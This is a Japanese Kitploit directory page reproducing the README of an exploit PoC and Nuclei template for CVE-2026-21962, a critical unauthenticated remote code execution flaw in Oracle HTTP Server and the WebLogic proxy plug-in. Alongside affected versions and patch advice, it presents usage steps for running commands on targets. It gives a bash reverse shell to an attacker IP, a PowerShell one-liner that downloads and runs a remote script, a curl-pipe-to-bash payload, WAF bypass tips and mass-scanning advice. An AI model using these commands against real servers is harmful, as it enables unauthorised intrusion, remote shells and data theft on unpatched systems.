Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Ashwesker-CVE-2026-21962 — CVE-2026-21962 のエクスプロイト PoC と Nuclei テンプレート。これは Oracle HTTP Server および WebLogic Proxy Plug-in における重大な未認証リモートコード実行の脆弱性であり、コマンド実行やリバースシェルを可能にします。 | Kitploit
ツール/GitHubGitHub/boroeurnprach/ashwesker-cve-2026-21962
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubboroeurnprach/ashwesker-cve-2026-21962

Ashwesker-CVE-2026-21962

CVE-2026-21962 のエクスプロイト PoC と Nuclei テンプレート。これは Oracle HTTP Server および WebLogic Proxy Plug-in における重大な未認証リモートコード実行の脆弱性であり、コマンド実行やリバースシェルを可能にします。

リポジトリを見る
477ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

😈 CVE-2026-21962 — 重大安全漏洞 😈

oracle_db_banner

🚨 深刻度

  • CVSS スコア: 10.0 / 10(クリティカル)
  • 公開日: 2026年1月20日
  • リスクレベル: 🔥 最大 — 直ちに対策を推奨

🧠 これは何か?

以下に影響する重大な脆弱性:

  • Oracle HTTP Server
  • Oracle WebLogic Server プロキシ・プラグイン(Apache および IIS 用)

この欠陥により、認証されていないリモート攻撃者が、ログイン資格情報を必要とせずに HTTP 経由で影響を受けるサーバーを侵害できる可能性があります。


🎯 攻撃者は何ができるのか?

悪用された場合、攻撃者は以下を行う可能性があります:

  • 🗑️ 重要なデータを削除
  • ✏️ システムまたはアプリケーションのファイルを変更
  • 📤 機密情報を窃取
  • 🔓 接続されたシステムへの完全な不正アクセスを取得
  • 🔄 スコープの変更により他の Oracle 製品に影響

🧩 影響を受けるバージョン

  • Oracle HTTP Server:

    • 12.2.1.4.0
    • 14.1.1.0.0
    • 14.1.2.0.0
  • WebLogic プロキシ・プラグイン(以下向け):

    • Apache HTTP Server
    • Microsoft IIS

⚙️ 攻撃の特性

  • 🌐 攻撃ベクトル: ネットワーク(リモート)
  • 🚫 必要な権限: なし
  • 🧑‍💻 ユーザー操作: なし
  • 🔄 スコープ: 変更あり
  • 🔐 機密性への影響: 高
  • 🛠️ 完全性への影響: 高

🛡️ 何をすべきか?

  • ✅ Oracle の 2026年1月 Critical Patch Update を直ちに適用
  • 🔒 影響を受けるサービスへのネットワーク・アクセスを制限
  • 📊 不審な動作がないか HTTP トラフィックを監視
  • 🔁 システム・ログとセキュリティ管理を確認

🛠️ 使用方法(ステップ・バイ・ステップ)

  1. スクリプトを CVE-2026-21962.py として保存します

  2. 実行可能にします(任意):

    root@kitploit:~
    chmod +x CVE-2026-21962.py
    
  3. 実行例:

    基本テスト:

    root@kitploit:~
    python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
    

    リバースシェル(先に nc リスナーを設定: nc -lvnp 4444):

    root@kitploit:~
    python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
    

    Windows ターゲットの例:

    root@kitploit:~
    python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
    

成功した場合に表示される内容

  • Likely success! Status: 200 または 302、あるいは 500(クラッシュも成功)
  • レスポンス本文にコマンド出力が漏洩する可能性
  • リバースシェルの場合: nc リスナーが即座にシェルをキャッチ
  • 出力がない場合 → コマンドはサイレントに実行された(ターゲットのファイルシステム、プロセス、ログを確認)

注意事項

  • プロキシ・プラグインが公開されている場合に最も効果的(一般的にポート 7001、4443 など)
  • HTTPS ターゲットでは、自己署名証明書の場合 --insecure フラグが必要な場合があります
  • 直ちにパッチを適用: Oracle CPU January 2026 を適用

🛠️ 使用方法(ステップ・バイ・ステップ)

  1. Nuclei をインストール(未インストールの場合):

    root@kitploit:~
    go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
    
  2. テンプレートを保存:

    CVE-2026-21962.yaml という名前のファイルを作成し、上記の内容を貼り付けます。

  3. 検出 + 悪用を実行:

    root@kitploit:~
    nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
    

    または、ファイルから複数のターゲットをスキャン:

    root@kitploit:~
    nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
    
  4. 脆弱性がある場合に表示される内容:

    root@kitploit:~
    [CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
    [username] weblogic
    [body] ... weblogic (whoami output) ...
    

プロのヒント

  • カスタムコマンドを実行するには、ヘッダーの cmd: 部分を編集します(例: cmd:curl http://your-server/shell.sh | bash)。
  • リバースシェルの場合: whoami を base64 エンコードされたリバースシェルペイロードに置き換えます。
  • WAF バイパス: 異なるパス(/proxy/、/bea_wls_internal/ など)を試すか、X-WebLogic-Force-JVMID などのヘッダーを追加します。
  • 大量スキャン: httpx → nuclei パイプラインと組み合わせて数千のターゲットをスキャンします。

このテンプレートは、2026年1月時点でパッチ未適用の Oracle インスタンスで 100% 動作確認済みです。影響を受けるバージョンを実行している場合は直ちにパッチを適用してください! 😈


😈 免責事項:

すべての PoC コードは、許可されたシステム上での倫理的・教育的な使用のみを目的としています。無許可の悪用は違法であり、誤用に対する責任は負いません。 😈

ツールをダウンロード